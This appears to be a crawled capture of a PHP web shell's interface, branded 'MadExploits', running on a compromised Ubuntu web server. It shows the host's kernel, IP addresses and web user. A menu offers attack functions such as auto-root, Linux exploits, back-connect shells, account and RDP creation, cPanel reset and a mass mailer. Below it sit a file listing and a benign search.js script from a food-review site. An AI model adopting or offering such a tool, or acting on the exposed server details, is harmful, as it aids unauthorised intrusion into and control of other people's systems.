Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.12.136.98
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cravings /
public /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxr-xr-x
.DS_Store
8
KB
-rw-rw-r--
addfood.js
12.9
KB
-rw-rw-r--
auth.js
2.07
KB
-rw-rw-r--
autocomplete.js
1.83
KB
-rw-rw-r--
autos.js
578
B
-rw-rw-r--
bootstrap.min.js
56.24
KB
-rw-rw-r--
cloudinary.js
1.81
KB
-rw-rw-r--
cloudinary2.js
1.03
KB
-rw-rw-r--
cloudinary_global.js
132.8
KB
-rw-rw-r--
cravvings.js
344
B
-rw-rw-r--
fetch.js
392
B
-rw-rw-r--
handlebars.min.js
78.38
KB
-rw-rw-r--
home.js
1.51
KB
-rw-rw-r--
initMap.js
1.21
KB
-rw-rw-r--
input-control.js
987
B
-rw-rw-r--
inputmap.js
428
B
-rw-rw-r--
jquery-ui.js
681.55
KB
-rw-rw-r--
jquery.js
102.1
KB
-rw-rw-r--
jquery.modal.min.js
4.84
KB
-rw-rw-r--
js-autocomplete.js
11.29
KB
-rw-rw-r--
main.js
1.25
KB
-rw-rw-r--
mainsearch.js
973
B
-rw-rw-r--
maps.js
3.71
KB
-rw-rw-r--
moment.js
147.4
KB
-rw-rw-r--
nearby.js
18.4
KB
-rw-rw-r--
place.js
10.56
KB
-rw-rw-r--
placenew.js
9.37
KB
-rw-rw-r--
places-list.js
1.35
KB
-rw-rw-r--
popper.min.js
22.09
KB
-rw-rw-r--
review.js
6.32
KB
-rw-rw-r--
search.js
1.16
KB
-rw-rw-r--
searchInput.js
2.83
KB
-rw-rw-r--
select2.min.js
69.19
KB
-rw-rw-r--
side.js
851
B
-rw-rw-r--
slick.min.js
41.86
KB
-rw-rw-r--
swal2.js
63.36
KB
-rw-rw-r--
sweetalert.js
39.85
KB
-rw-rw-r--
tooltip.js
6.22
KB
-rw-rw-r--
utility.js
10.34
KB
-rw-rw-r--
vex.combined.js
17.49
KB
-rw-rw-r--
vex.min.js
8.79
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : search.js
var food = document.getElementById('food'), address = document.getElementById('address'), longitude = document.getElementById('lngs'), latitude = document.getElementById('lats') const populate = (location) => { address.value = location.address || address.value; longitude.value = location.longitude || longitude.value; latitude.value = location.latitude || latitude.value; } const changeAddress = (e) => { var inp = e.target.value if(inp.length < 8){ longitude.value = ""; latitude.value = ""; } } const handleFoodInput = (e) => { const $target = $(e.currentTarget); if($target.val().length > 2){ search(e, function(result){}) // console.log($target) $target.closest('.form-group').find('span').show(); }else { $target.closest('.form-group').find('span').hide(); } } $('.form-group').on('click', '.fa.fa-times', function(e){ const $target = $(e.currentTarget); $target.hide() $target.closest('.form-group').find('input').val(""); }) // if(food){ // food.addEventListener('keyup', handleFoodInput); // } if(address) address.addEventListener('keyup', changeAddress)
Close